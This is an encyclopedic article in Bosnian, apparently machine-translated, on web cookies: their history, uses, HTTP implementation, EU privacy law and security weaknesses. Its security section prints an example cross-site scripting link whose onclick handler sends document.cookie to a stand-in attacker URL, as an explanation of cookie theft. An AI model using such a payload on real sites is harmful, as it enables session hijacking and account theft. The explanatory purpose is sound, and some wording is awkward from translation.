Internet kolačić: šta je to? Definicija, porijeklo, vrste i privatnost

Un kolačić ili web kolačić (ili kolačić, skraćeno kao svjedok u Quebecu) je definiran HTTP komunikacijskim protokolom kao niz informacija koje HTTP server šalje HTTP klijentu, koje ovaj vraća svaki put kada se isti HTTP server upita pod određenim uvjetima.

Kolačić je ekvivalent a mali tekstualni fajl pohranjen na terminalu korisnika interneta. Postoje više od 20 godina, omogućavaju programerima web stranica da pohranjuju korisničke podatke kako bi im olakšali navigaciju i omogućili određene funkcionalnosti. Kolačići su uvijek bili manje-više kontroverzni jer sadrže preostale lične podatke koje potencijalno mogu iskoristiti treće strane.

Web server ga šalje kao HTTP zaglavlje veb pretraživaču koji ga vraća nepromenjenog svaki put kada pristupi serveru. Kolačić se može koristiti za autentifikaciju, sesiju (državno održavanje), i za pohraniti određene podatke o korisniku, kao što su postavke lokacije ili sadržaj elektronske korpe za kupovinu. Izraz kolačić je izveden iz magični kolačić, dobro poznati koncept u UNIX računarstvu, koji je inspirisao ideju i naziv kolačića pretraživača. Postoji nekoliko alternativa kolačićima, od kojih svaka ima svoju upotrebu, prednosti i nedostatke.

Budući da su jednostavni tekstualni fajlovi, kolačići nisu izvršni. Oni nisu ni špijunski softver ni virusi, iako mnogi antivirusni softveri otkrivaju kolačiće s nekih web lokacija jer omogućavaju praćenje korisnika kada posjećuju više stranica. 

Većina modernih pretraživača omogućava korisnicima da odlučiti hoćete li prihvatiti ili odbiti kolačiće. Korisnici također mogu odaberite koliko dugo se kolačići čuvaju. Međutim, potpuno odbijanje kolačića čini neke stranice neupotrebljivim. Na primjer, pohranite kolica za kupovinu ili web stranice koje zahtijevaju prijavu pomoću vjerodajnica (korisničko ime i lozinka).

historique

Termin kolačić potiče od engleskog izraza magični kolačić, što je paket podataka koji program prima i vraća nepromijenjen. Kolačići su već korišteni u IT-u kada Lou Montulli imao ideju da ih koristi u web komunikaciji u junu 1994. Tada je bio zaposlen u kompaniji Netscape Communications, koja je razvila aplikaciju za e-trgovinu za klijenta. Kolačići su dali rešenje za problem pouzdanosti implementacije virtuelne korpe za kupovinu.

John Giannandrea i Lou Montulli napisali su prvu Netscapeovu specifikaciju kolačića iste godine. Verzija 0.9 beta Mosaic Netscapea, objavljena 13. oktobra 1994., integrisana tehnologija kolačića (vidi post). Prva (neeksperimentalna) upotreba kolačića bila je da se utvrdi da li su posjetitelji Netscape web stranice ranije posjetili tu stranicu. Montulli je 1995. godine podnio prijavu za patent za tehnologiju kolačića i odobren je američki patent 5774670. dodeljeno 1998.

Nakon implementacije u Netscape 0.9 beta 1994. godine, kolačići su integrisani u Internet Explorer 2, objavljen u oktobru 1995. godine.

Uvođenje kolačića još uvijek nije široko poznato javnosti. Konkretno, kolačići su podrazumevano prihvaćeni u postavkama pretraživača, a korisnici nisu bili obavešteni o njihovom prisustvu. Neki ljudi su bili svjesni postojanja kolačića oko prvog tromjesečja 1995., ali šira javnost je za njihovo postojanje počela tek nakon što je Financial Times objavio članak 12. februara 1996. Iste godine kolačići su dobili veliku medijsku pažnju zbog mogućih upada u privatnost. O temi kolačića raspravljalo se u dvije konsultacije američke Federalne trgovinske komisije 1996. i 1997. godine.

Razvoj službene specifikacije kolačića je već bio u toku. Prve rasprave o službenoj specifikaciji održane su u aprilu 1995. na www-talk mailing listi. Formirana je posebna radna grupa IETF-a. Dva alternativna predloga za uvođenje stanja u HTTP transakcije predložili su Brian Behlendorf i David Kristol, respektivno, ali je grupa, predvođena samim Kristolom, odlučila da koristi Netscapeovu specifikaciju kao polaznu tačku. U februaru 1996. radna grupa je utvrdila da su kolačići trećih strana značajna prijetnja privatnosti. Specifikacija koju je proizvela grupa na kraju je objavljena kao RFC 2109.

Od kraja 2014. godine na mnogim stranicama vidimo baner o kolačićima. Postoji najmanje jedna ekstenzija pretraživača koja omogućava baner nije prikazan.

Vrste kolačića i upotreba

Upravljanje sesijama

Kolačići se mogu koristiti za održavanje korisničkih podataka tokom navigacije, ali i tokom višestrukih posjeta. Kolačići su uvedeni da obezbede sredstvo za implementaciju elektronskih kolica za kupovinu, virtuelnog uređaja u kojem korisnik može da akumulira artikle koje želi da kupi dok pretražuje sajt.

Ovih dana, aplikacije poput kolica za kupovinu umjesto toga pohranjuju listu stavki u bazu podataka na serveru, što je poželjno; nego da ih sačuvate u samom kolačiću. Web server šalje kolačić koji sadrži jedinstveni ID sesije. Web pretraživač zatim vraća ovaj ID sesije na svaki sljedeći zahtjev i stavke u korpi se spremaju i povezuju s tim istim jedinstvenim ID-om sesije.

Česta upotreba kolačića korisna je za prijavu na web stranicu pomoću vjerodajnica. Ukratko, web server prvo šalje kolačić koji sadrži jedinstveni ID sesije. Zatim korisnici daju svoje vjerodajnice (obično korisničko ime i lozinku). Web aplikacija zatim autentifikuje sesiju i dozvoljava korisniku pristup servisu.

personalizacija

Kolačići se mogu koristiti za pamćenje informacija o korisniku neke stranice, kako bi mu u budućnosti prikazali odgovarajući sadržaj. Na primjer, web server može poslati kolačić koji sadrži posljednje korisničko ime korišteno za prijavu na tu web stranicu, tako da se korisničko ime može unaprijed popuniti prilikom budućih posjeta.

Mnoge web stranice koriste kolačiće za personalizaciju na osnovu korisničkih preferencija. Korisnici biraju svoje željene postavke u obrascu i šalju ih na server. Server kodira postavke u kolačić i šalje ih nazad u pretraživač. Nakon toga, svaki put kada korisnik pristupi stranici ove stranice, pretraživač vraća kolačić, a time i listu postavki; server zatim može prilagoditi stranicu prema željama korisnika. Na primjer, web stranica Wikipedia omogućava svojim korisnicima da odaberu izgled stranice koju preferiraju. Google pretraživač omogućava svojim korisnicima (čak i ako nisu registrovani) da odaberu broj rezultata koje žele da vide na svakoj stranici sa rezultatima.

Praćenje

Kolačići za praćenje koriste se za praćenje navika pretraživanja internetskih korisnika. Ovo se takođe može delimično uraditi korišćenjem IP adrese računara koji postavlja zahtev za stranicu ili korišćenjem HTTP zaglavlja 'referrer' koje klijent šalje sa svakim zahtevom, ali kolačići omogućavaju veću preciznost. To se može učiniti kao u sljedećem primjeru:

1. Ako korisnik pozove stranicu na web mjestu, a zahtjev ne sadrži kolačić, server pretpostavlja da je ovo prva stranica koju je korisnik posjetio. Server zatim kreira nasumični niz i šalje ga pretraživaču zajedno sa traženom stranicom.
2. Od ovog trenutka, kolačić će automatski biti poslan od strane pretraživača svaki put kada se pozove nova stranica stranice. Server će poslati stranicu kao i obično, ali će također evidentirati URL pozvane stranice, datum, vrijeme zahtjeva i kolačić u log fajl.

Gledajući log datoteku, tada je moguće vidjeti koje je stranice korisnik posjetio i kojim redoslijedom. Na primjer, ako datoteka sadrži nekoliko zahtjeva napravljenih pomoću kolačića id=abc, to može utvrditi da svi ovi zahtjevi dolaze od istog korisnika. Zatraženi URL, datum i vrijeme povezani sa zahtjevima omogućavaju praćenje korisnikovog pregledavanja.

Kolačići trećih strana i web beacons, objašnjeni u nastavku, dodatno omogućavaju praćenje na različitim web lokacijama. Praćenje jedne stranice se obično koristi u statističke svrhe. Nasuprot tome, praćenje na različitim web lokacijama pomoću kolačića trećih strana obično se koristi od strane reklamnih kompanija za izradu anonimnih korisničkih profila (koji se zatim koriste za određivanje koje reklame treba prikazati korisniku, kao i za slanje e-pošte u skladu s tim oglasima – SPAM ).

Kolačići za praćenje predstavljaju rizik od invazije na privatnost korisnika, ali se mogu lako izbrisati. Većina modernih pretraživača uključuje opciju za automatsko brisanje trajnih kolačića prilikom zatvaranja aplikacije.

Kolačići treće strane

Slike i drugi objekti sadržani na web stranici mogu se nalaziti na serverima koji se razlikuju od servera na kojem se nalazi stranica. Da bi prikazao stranicu, pretraživač preuzima sve ove objekte. Većina web stranica sadrži informacije iz različitih izvora. Na primjer, ako upišete www.example.com u svoj pretraživač, često će se na dijelu stranice nalaziti objekti ili reklame koje dolaze iz različitih izvora, tj. s domena različitog od www. .example.com. Kolačići "prve" strane su kolačići koje postavlja domena navedena u adresnoj traci pretraživača. Kolačiće treće strane postavlja jedan od objekata stranice koji dolazi s druge domene.

Prema zadanim postavkama, pretraživači kao što su Mozilla Firefox, Microsoft Internet Explorer i Opera prihvataju kolačiće trećih strana, ali korisnici mogu promijeniti postavke u opcijama preglednika kako bi ih blokirali. Ne postoji sigurnosni rizik svojstven kolačićima trećih strana koji omogućavaju web funkcionalnost, ali se također koriste za praćenje korisnika. od stranice do stranice.

Alati kao što je Ghostery dostupni za sve pretraživače uključujući Google Chrome mogu blokirati razmjenu između trećih strana.

Implementacija

Kolačići su mali dijelovi podataka koje web server šalje pregledniku. Pregledač ih vraća nepromijenjene serveru, uvodeći stanje (pamćenje prošlih događaja) u HTTP transakciju inače bez stanja. Bez kolačića, svako preuzimanje web stranice ili komponente web stranice je izolirani događaj, neovisno o drugim zahtjevima upućenim istoj stranici. Osim što ih može postaviti web server, kolačići se mogu postaviti i jezicima za skriptiranje kao što je JavaScript, ako ih pretraživač podržava i ovlasti.

Zvanična specifikacija kolačića sugerira da bi pretraživači trebali biti u mogućnosti pohraniti i ponovo poslati minimalni broj kolačića. Konkretno, pretraživač bi trebao biti u mogućnosti pohraniti najmanje 300 kolačića od četiri kilobajta svaki i najmanje 20 kolačića za jedan server ili domenu.

Prema odjeljku 3.1 RFC 2965, imena kolačića ne razlikuju velika i mala slova.

Kolačić može odrediti datum njegovog isteka, u kom slučaju će kolačić biti obrisan tog datuma. Ako kolačić ne navodi datum isteka, kolačić se briše čim korisnik napusti svoj pretraživač. Stoga je određivanje datuma isteka način da kolačić preživi kroz više sesija. Iz tog razloga se kaže da su kolačići s datumom isteka uporan. Primjer aplikacije: maloprodajna stranica može koristiti trajne kolačiće za snimanje artikala koje su korisnici stavili u svoju košaricu (u stvarnosti, kolačić se može odnositi na unos sačuvan u bazi podataka na prodajnom mjestu, a ne na vašem računalu) . Na taj način, ako korisnici napuste svoj pretraživač bez kupovine i kasnije mu se vrate, moći će ponovo pronaći artikle u korpi. Ako ovi kolačići ne daju datum isteka, istekli bi kada se pretraživač zatvori, a podaci o sadržaju korpe bi bili izgubljeni.

Kolačići mogu biti ograničeni u opsegu na određenu domenu, poddomenu ili putanju na serveru koji ih je kreirao.

Kreiranje kolačića

Prijenos web stranica se vrši korištenjem HyperText Transfer Protocol (HTTP). Ignorišući kolačiće, pretraživači pozivaju stranicu sa web servera tako što im uglavnom šalju kratki tekst pod nazivom HTTP zahtjev. Na primjer, da bi pristupili stranici www.example.org/index.html, pretraživači se povezuju na server www.example.org i šalju zahtjev koji izgleda ovako:

	GET /index.html HTTP/1.1Host: www.example.org
navigator	→	server

Server odgovara slanjem tražene stranice, kojoj prethodi sličan tekst, a cijela se poziva HTTP odgovor. Ovaj paket može sadržavati linije koje upućuju pretraživaču da pohrani kolačiće:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML stranica)
navigator	←	server

Server šalje liniju Set-Cookie samo ako server želi da pretraživač pohrani kolačić. Set-Cookie je zahtjev za pretraživač da pohrani string name=value i vrati ga u svim budućim zahtjevima serveru. Ako pretraživač podržava kolačiće i kolačići su omogućeni u opcijama pretraživača, kolačić će biti uključen u sve naredne zahtjeve upućene istom serveru. Na primjer, pretraživač poziva stranicu www.example.org/news.html slanjem sljedećeg zahtjeva serveru www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: ime=valueAccept: */*
navigator	→	server

Ovo je zahtjev za drugu stranicu sa istog servera, a razlikuje se od prve gore jer sadrži string koji je server prethodno poslao pretraživaču. Zahvaljujući tome, server zna da je ovaj zahtjev povezan sa prethodnim. Server odgovara slanjem pozvane stranice, kao i dodavanjem drugih kolačića na nju.

Vrijednost kolačića server može promijeniti slanjem novog reda Set-Cookie: name=new_value kao odgovor na pozvanu stranicu. Pretraživač tada zamjenjuje staru vrijednost novom.

Set-Cookie liniju obično kreira CGI program ili drugi skriptni jezik, a ne HTTP server. HTTP server (primjer: Apache) će samo prenijeti rezultat programa (dokument kojem prethodi zaglavlje koje sadrži kolačiće) u pretraživač.

Kolačiće takođe može postaviti JavaScript ili drugi slični jezici koji se pokreću u pretraživaču, tj. na strani klijenta, a ne na strani servera. U JavaScript-u se u tu svrhu koristi objekt document.cookie. Na primjer, izjava document.cookie = "temperature=20" kreira kolačić pod nazivom "temperature" i sa vrijednošću 20.

Atributi kolačića

Osim para ime/vrijednost, kolačić može sadržavati i datum isteka, putanju, naziv domene i vrstu konekcije koja je namijenjena, tj. normalna ili šifrirana. RFC 2965 također definira da kolačići moraju imati obavezni broj verzije, ali se to općenito izostavlja. Ovi dijelovi podataka slijede par ime=nova_vrijednost i odvojeni su tačkom i zarezom. Na primjer, server može kreirati kolačić slanjem linije Set-Cookie: name=new_value; expires=date; path=/; domain=.example.org.

Istek kolačića

Kolačići ističu i tada ih pretraživač ne šalje na server u sljedećim situacijama:

• Kada je pretraživač zatvoren, ako kolačić nije postojan.
• Kada istekne rok trajanja kolačića.
• Kada se datum isteka kolačića promijeni (od strane servera ili skripte) na datum u prošlosti.
• Kada pretraživač izbriše kolačić na zahtjev korisnika.

Treća situacija dozvoljava serverima ili skriptama da eksplicitno izbrišu kolačić. Imajte na umu da je moguće pomoću web preglednika Google Chrome saznati datum isteka određenog kolačića pristupom postavkama sadržaja. Kolačić sačuvan na računaru može ostati tamo nekoliko decenija ako se ne preduzme postupak za njegovo brisanje.

Stereotipi

Od njihovog uvođenja na Internet, mnoge ideje o kolačićima kružile su internetom i medijima. Godine 1998., CIAC, tim za praćenje kompjuterskih incidenata Ministarstva energetike Sjedinjenih Država, utvrdio je da su sigurnosne ranjivosti kolačića "u suštini nepostojeće" i objasnio da "informacije o poreklu vaših posjeta i detalji o web stranicama koje ste posjetili već postoje u log datotekama web servera”. Jupiter Research je 2005. godine objavio rezultate studije u kojoj je značajan procenat ispitanika razmatrao sljedeće tvrdnje:

• Kolačići su slični virus, zaraze hard diskove korisnika.
• Kolačići se generišu iskočiti.
• Za slanje se koriste kolačići spam.
• Kolačići se koriste samo za oglašavanje.

Kolačići ne mogu brisati ili čitati informacije sa računara korisnika. Međutim, kolačići omogućavaju otkrivanje web stranica koje je korisnik posjetio na određenoj stranici ili skupu web-mjesta. Ove informacije se mogu prikupiti u korisničkom profilu koji se može koristiti ili preprodati trećim stranama, što može predstavljati ozbiljne probleme u vezi s privatnošću. Neki profili su anonimni, u smislu da ne sadrže lične podatke, ali čak i takvi profili mogu biti upitni.

Prema istom istraživanju, veliki postotak korisnika interneta ne zna kako izbrisati kolačiće. Jedan od razloga zašto ljudi ne vjeruju kolačićima je taj što su neke web stranice zloupotrebile aspekt kolačića koji identifikuju osobne podatke i podijelili ove informacije s drugim izvorima. Veliki postotak ciljanog oglašavanja i neželjene e-pošte, koji se smatra neželjenom poštom, dolazi od informacija prikupljenih iz kolačića za praćenje.

Postavke pretraživača

Većina pretraživača podržava kolačiće i omogućava korisniku da ih onemogući. Najčešće opcije su:

• Omogućite ili onemogućite kolačiće u potpunosti, tako da se stalno prihvaćaju ili blokiraju.
• Dozvolite korisniku da vidi aktivne kolačiće na datoj stranici, unošenjem javascript: alert(document.cookie) u adresnu traku pretraživača. Neki pretraživači uključuju upravitelja kolačića za korisnika koji može pregledati i selektivno izbrisati kolačiće koje trenutno pohranjuje pretraživač.

Većina pretraživača također dozvoljava potpuno brisanje ličnih podataka koji uključuju kolačiće. Postoje i dodatni moduli za kontrolu dozvola kolačića.

Privatnost i kolačići trećih strana

U ovom izmišljenom primjeru, reklamna kompanija je postavila banere na dvije web stranice. Hostovanjem banera na svojim serverima i upotrebom kolačića trećih strana, reklamna kompanija je u mogućnosti da prati navigaciju korisnika kroz ova dva sajta.

Kolačići imaju važne implikacije na privatnost i anonimnost web korisnika. Iako se kolačići vraćaju samo na server koji ih je postavio ili na server koji pripada istoj internet domeni, web stranica može sadržavati slike ili druge komponente pohranjene na serverima koji pripadaju drugim domenima. Kolačići koji se postavljaju tokom oporavka ovih vanjskih komponenti se pozivaju kolačići treće strane. Ovo uključuje kolačiće iz neželjenih iskačućih prozora.

Oglašivačke kompanije koriste kolačiće trećih strana za praćenje korisnika na različitim stranicama koje posjećuju. Konkretno, reklamna kompanija može pratiti korisnika na svim stranicama na koje je postavila reklamne slike ili piksel za praćenje. Poznavanje stranica koje korisnik posjećuje omogućava oglašivačkoj kompaniji da cilja na preferencije oglašavanja korisnika.

Neki smatraju da je mogućnost izrade korisničkog profila narušavanje privatnosti, posebno kada se praćenje vrši na različitim domenima pomoću kolačića trećih strana. Iz tog razloga, neke zemlje imaju zakone o kolačićima.

Vlada Sjedinjenih Država uvela je stroga pravila o postavljanju kolačića 2000. godine, nakon što je otkriveno da Ured Bijele kuće za politiku droga koristi kolačiće za praćenje kompjutera korisnika koji gledaju online reklame za lijekove. 2002. aktivista za privatnost Daniel Brandt otkrio je da je CIA ostavila trajne kolačiće na kompjuterima koji su posjetili njene web stranice. Nakon što je obaviještena o ovom kršenju, CIA je izjavila da ovi kolačići nisu bili namjerno poslani i prestala ih postavljati. 25. decembra 2005. Brandt je otkrio da je Agencija za nacionalnu sigurnost (NSA) ostavila dva trajna kolačića na računarima posjetitelja zbog ažuriranja softvera. Nakon obavještenja, NSA je odmah onemogućila kolačiće.

U Ujedinjenom Kraljevstvu, the Zakon o kolačićima “, koji je stupio na snagu 25. maja 2012. godine, obavezuje sajtove da se izjasne o svojim namjerama, čime se omogućava korisnicima da izaberu da li žele ili ne ostavljaju tragove svog prolaska na Internetu. Tako se mogu zaštititi od ciljanja reklama. Kako god, prema The Guardian, pristanak korisnika interneta nije nužno izričit; izvršene su izmjene uslova pristanka korisnika, čineći ga tako implicirano.

Direktiva 2002/58 o privatnosti

Direktiva 202/58 o privatnosti i elektroničkim komunikacijama sadrži pravila o korištenju kolačića. Konkretno, član 5, stav 3 ove direktive zahtijeva da se pohrana podataka (kao što su kolačići) na računaru korisnika može izvršiti samo ako:

• korisnik je obaviješten o tome kako se podaci koriste;
• korisnik ima mogućnost da odbije ovu operaciju skladištenja. Međutim, ovaj član takođe navodi da je skladištenje podataka iz tehničkih razloga izuzeto iz ovog zakona.

Direktiva je trebala biti implementirana od listopada 2003., međutim, prema izvještaju iz decembra 2004. godine, direktiva je tek vrlo nesavršeno provedena u praksi, u kojem se također ističe da određene države članice (Slovačka, Latvija, Grčka, Belgija i Luksemburg) još nisu prenijele direktive u domaće pravo.

Prema mišljenju G29 iz 2010. godine, ova direktiva, koja posebno uslovljava upotrebu kolačića u svrhu bihevioralnog oglašavanja, o izričitoj saglasnosti korisnika interneta i dalje se vrlo slabo primjenjuje. Zapravo, većina sajtova to čini na način koji nije u skladu sa direktivom, ograničavajući se na jednostavan "baner" koji obaveštava o upotrebi "kolačića" bez davanja informacija o upotrebi, bez razlikovanja između "tehničkih" kolačića. "praćenje" kolačića, niti da ponudi pravi izbor korisniku koji želi da održava tehničke kolačiće (kao što su kolačići za upravljanje kolicima za kupovinu) i odbije kolačiće "praćenja". U stvari, mnoge stranice ne funkcionišu ispravno ako se kolačići odbiju, što nije u skladu sa direktivom 2002/58 ili direktivom 95/46 (Zaštita ličnih podataka).

Direktiva 2009/136/CE

Ovaj materijal je ažuriran Direktivom 2009/136/EC od 25. novembra 2009. godine koja kaže da je „čuvanje informacija ili dobijanje pristupa informacijama koje su već pohranjene u terminalnoj opremi pretplatnika ili korisnika dozvoljeno samo pod uslovom da pretplatnik ili korisnik je dao svoj pristanak, nakon što je primio, u skladu sa Direktivom 95/46/EC, jasne i potpune informacije između ostalih o svrhama obrade”. Nova direktiva stoga pojačava obaveze prije postavljanja kolačića na računar korisnika interneta.

U preliminarnim razmatranjima direktive, evropski zakonodavac međutim precizira: „Tamo gde je tehnički moguće i delotvorno, u skladu sa relevantnim odredbama Direktive 95/46/EC, pristanak korisnika u pogledu obrade može se izraziti putem korištenje odgovarajućih postavki pretraživača ili druge aplikacije”. Ali u stvari, nijedan pretraživač do danas ne omogućava razdvajanje osnovnih tehničkih kolačića od opcionih koje bi trebalo ostaviti na izboru korisnika.

Ovu novu direktivu transponirali su belgijski poslanici u julu 2012. Studija iz 2014. pokazuje da se čak i poslanici bore da primjene ograničenja direktive.

P3P

P3P specifikacija uključuje mogućnost da server navede politiku privatnosti, koja definira koju vrstu informacija prikuplja i u koju svrhu. Ova pravila uključuju (ali nisu ograničena na) korištenje informacija prikupljenih korištenjem kolačića. Prema definicijama P3P-a, pretraživač može prihvatiti ili odbiti kolačiće upoređujući politiku privatnosti sa preferencijama korisnika ili tako što će pitati korisnika, prezentirajući izjavu o privatnosti politike privatnosti koju je deklarirao server.

Mnogi pretraživači, uključujući Apple Safari i Microsoft Internet Explorer verzije 6 i 7, podržavaju P3P koji omogućava pretraživaču da odredi hoće li prihvatiti pohranu kolačića treće strane. Opera pretraživač omogućava korisnicima da odbiju kolačiće trećih strana i da kreiraju globalni i specifični sigurnosni profil za internet domene. Mozilla Firefox verzija 2 ukinula je podršku za P3P, ali ju je vratila u verziju 3.

Većina pretraživača može blokirati kolačiće trećih strana kako bi se povećala privatnost i smanjilo praćenje oglasa, bez negativnog utjecaja na korisničko iskustvo na webu. Mnoge reklamne agencije nude opciju odustati ciljanom oglašavanju, postavljanjem generičkog kolačića u pretraživač koji deaktivira ovo ciljanje, ali takvo rješenje nije praktično efikasno, kada se poštuje, jer se ovaj generički kolačić briše čim korisnik izbriše ove kolačiće čime se otkazuje opcija van odluke.

Nedostaci kolačića

Osim problema s privatnošću, kolačići imaju i neke tehničke nedostatke. Konkretno, oni ne identifikuju uvek tačno korisnike, mogu usporiti performanse sajta kada su u velikom broju, mogu se koristiti za bezbednosne napade i sukobljavaju se sa reprezentativnim prenosom stanja, arhitektonskim stilom softvera.

Neprecizna identifikacija

Ako se na računaru koristi više od jednog pretraživača, u svakom od njih uvek postoji zasebna jedinica za skladištenje kolačića. Kolačići stoga ne identifikuju osobu, već kombinaciju korisničkog naloga, računara i web pretraživača. Stoga, svako može koristiti ove naloge, računare ili pretraživače koji imaju mnoštvo kolačića. Slično, kolačići ne prave razliku između više korisnika koji dijele isti korisnički račun, računar i pretraživač, kao što su "internet kafići" ili bilo koje mjesto koje daje besplatan pristup računarskim resursima.

Ali u praksi se ova tvrdnja u većini slučajeva ispostavlja pogrešnom jer danas "lični" računar (ili pametni telefon, ili tablet, što je još gore) koristi uglavnom jedan pojedinac. To se svodi na ciljanje određene osobe i kroz količinu prikupljenih informacija dolazi do personaliziranog ciljanja čak i ako osoba nije „naime“ identificirana.

Krađa kolačića

Kolačić može ukrasti drugi računar na mreži.

Tokom normalnog rada, kolačići se šalju nazad između servera (ili grupe servera u istom domenu) i pretraživača računara korisnika. Budući da kolačići mogu sadržavati osjetljive informacije (korisničko ime, lozinku koja se koristi za autentifikaciju, itd.), njihove vrijednosti ne bi trebale biti dostupne drugim računalima. Krađa kolačića je čin presretanja kolačića od strane neovlaštene treće strane.

Kolačići se mogu ukrasti putem njuškanja paketa u napadu koji se zove otmica sesije. Saobraćaj na mreži mogu presresti i čitati računari koji nisu oni koji šalju i primaju (posebno na nešifrovanom javnom Wi-Fi prostoru). Ovaj promet uključuje kolačiće poslane tokom sesija korištenjem običnog HTTP protokola. Kada mrežni promet nije šifriran, zlonamjerni korisnici tako mogu čitati komunikacije drugih korisnika na mreži koristeći "sniffers paketa".

Ovaj problem se može prevazići šifrovanjem veze između računara korisnika i servera koristeći HTTPS protokol. Server može specificirati a sigurna zastava prilikom postavljanja kolačića; pretraživač će ga poslati samo preko bezbedne linije, kao što je SSL veza.

Međutim, mnoge stranice, iako koriste HTTPS šifriranu komunikaciju za autentifikaciju korisnika (tj. stranicu za prijavu), kasnije šalju kolačiće sesije i druge podatke kao i normalno, putem nešifriranih HTTP veza iz razloga efikasnosti. Napadači tako mogu presresti kolačiće drugih korisnika i lažno ih predstavljati na odgovarajućim stranicama ili ih koristiti u napadima kolačićima.

Skriptiranje na stranici: kolačić koji treba razmjenjivati ​​samo između servera i klijenta šalje se drugoj trećoj strani.

Drugi način za krađu kolačića je skriptiranje web lokacija i navođenje samog pretraživača da pošalje kolačiće zlonamjernim serverima koji ih nikada ne prime. Savremeni pretraživači omogućavaju izvršavanje traženih delova koda sa servera. Ako se kolačićima pristupi tokom vremena rada, njihove vrijednosti mogu se u nekom obliku prenijeti serverima koji im ne bi trebali pristupiti. Šifriranje kolačića prije nego što se pošalju preko mreže ne pomaže u sprječavanju napada.

Ovu vrstu skriptiranja na lokaciji obično koriste napadači na web lokacijama koje korisnicima omogućavaju postavljanje HTML sadržaja. Integracijom dijela kompatibilnog koda u HTML prilog, napadač može primiti kolačiće od drugih korisnika. Poznavanje ovih kolačića može se koristiti povezivanjem na istu stranicu koristeći ukradene kolačiće, čime se prepoznaje kao korisnik čiji su kolačići ukradeni.

Jedan od načina za sprječavanje takvih napada je korištenje oznake HttpOnly; to je opcija, uvedena od verzije 6 Internet Explorer-a u PHP-u od verzije 5.2.0 koja je planirana da učini kolačić nedostupnim klijentu blizu skripte. Međutim, web programeri bi to trebali uzeti u obzir prilikom razvoja svojih web stranica kako bi bili imuni na skriptiranje na stranici.

Još jedna sigurnosna prijetnja koja se koristi je fabrikovanje potražnje na lokaciji.

Zvanična tehnička specifikacija dozvoljava da se kolačići pošalju nazad samo na servere u domeni sa koje potiču. Međutim, vrijednost kolačića može se poslati na druge servere koristeći sredstva koja nisu zaglavlja kolačića.

Konkretno, skript jezicima kao što je JavaScript općenito je dozvoljen pristup vrijednostima kolačića i mogu slati proizvoljne vrijednosti na bilo koji server na Internetu. Ova mogućnost skriptiranja se koristi sa web lokacija koje omogućavaju korisnicima da objavljuju HTML sadržaj koji drugi korisnici mogu vidjeti.

Na primjer, napadač koji radi na domeni example.com može objaviti komentar koji sadrži sljedeći link koji upućuje na popularni blog koji inače ne kontrolira:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Kada drugi korisnik klikne na ovu vezu, pretraživač izvršava dio koda atributa onclick, tako da zamjenjuje niz document.cookie listom korisničkih kolačića koji su aktivni za ovu stranicu. Stoga se ova lista kolačića šalje serveru example.com i napadač je stoga u mogućnosti prikupiti kolačiće ovog korisnika.

Ovu vrstu napada je teško otkriti na strani korisnika jer skripta dolazi s iste domene koja je postavila kolačić, a čini se da je operacija slanja vrijednosti ovlaštena od strane tog domena. Smatra se da je odgovornost administratora koji upravljaju ovom vrstom sajta da uvedu ograničenja koja sprečavaju objavljivanje zlonamernog koda.

Kolačići nisu direktno vidljivi programima na strani klijenta kao što je JavaScript ako su poslani sa zastavicom HttpOnly. Sa stanovišta servera, jedina razlika je u tome što je u red zaglavlja Set-Cookie dodato novo polje koje sadrži string HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Kada pretraživač primi takav kolačić, trebao bi ga normalno koristiti u sljedećoj HTTP razmjeni, ali bez da ga učini vidljivim skriptama koje se izvršavaju na strani klijenta. Oznaka HttpOnly nije dio nijedne službene tehničke specifikacije i nije implementirana u svim pretraživačima. Imajte na umu da trenutno ne postoji način da se spriječi čitanje i pisanje kolačića sesije metodom XMLHTTPRequest.

Izmjena sadržaja: napadač šalje serveru nevažeći kolačić, moguće napravljen od važećeg kolačića koji je poslao server.

Promjena kolačića

Čim kolačiće treba pohraniti i vratiti nepromijenjeni na server, napadač može izmijeniti vrijednost kolačića prije nego što se pošalju nazad na server. Na primjer, ako kolačić sadrži ukupnu vrijednost koju korisnik mora platiti za artikle stavljene u korpu za kupovinu, promjena ove vrijednosti izlaže server riziku da napadaču naplati manje od početne cijene. Poziva se proces modifikacije vrijednosti kolačića trovanje kolačićima i može se koristiti nakon krađe kolačića kako bi napad bio uporan.

U metodi nadjačavanja kolačića, napadač iskorištava grešku preglednika da pošalje nevažeći kolačić na server.

Većina web stranica, međutim, pohranjuje samo ID sesije — nasumično generirani jedinstveni broj koji se koristi za identifikaciju korisnika sesije — u samom kolačiću, dok su sve ostale informacije pohranjene na serveru. U ovom slučaju ovaj problem je u velikoj mjeri riješen.

Rukovanje kolačićima između web stranica

Očekuje se da svaka stranica ima svoje kolačiće, tako da jedna stranica ne bi trebala moći modificirati ili kreirati kolačiće povezane s drugom web-stranicom. Sigurnosna greška web preglednika može dozvoliti zlonamjernim stranicama da prekrše ovo pravilo. Iskorištavanje takve mane se obično naziva kuhanje na više mjesta. Svrha takvih napada može biti krađa ID-a sesije.

Korisnici bi trebali koristiti najnovije verzije web pretraživača u kojima su ove ranjivosti praktično eliminirane.

Konfliktno stanje između klijenta i servera

Upotreba kolačića može stvoriti kontradikciju između stanja klijenta i stanja pohranjenog u kolačiću. Ako korisnik dobije kolačić i klikne na dugme "Nazad" u pretraživaču, stanje pretraživača generalno nije isto kao pre ove akvizicije. Na primjer, ako je korpa online trgovine kreirana pomoću kolačića, sadržaj korpe se ne može promijeniti kada se korisnik vrati u povijest preglednika: ako korisnik pritisne dugme za dodavanje artikla u svoju korpu i klikne na „Vrati ", članak ostaje u ovom. To možda nije namjera korisnika, koji svakako želi poništiti dodavanje članka. To može dovesti do nepouzdanosti, zabune i grešaka. Stoga bi web programeri trebali biti svjesni ovog problema i implementirati mjere za rješavanje ovakvih situacija.

Istek kolačića

Stručnjaci za sigurnost privatnosti kritizirali su trajne kolačiće jer nisu zakazani da isteknu dovoljno brzo, čime se omogućava web stranicama da prate korisnike i izgrade njihov profil tokom vremena. Ovaj aspekt kolačića je također dio problema otmice sesije, jer se ukradeni trajni kolačić može koristiti za lažno predstavljanje korisnika u dužem vremenskom periodu.

Pročitajte takođe: GAFAM: ko su oni? Zašto su (ponekad) tako strašni?

Alternative kolačićima

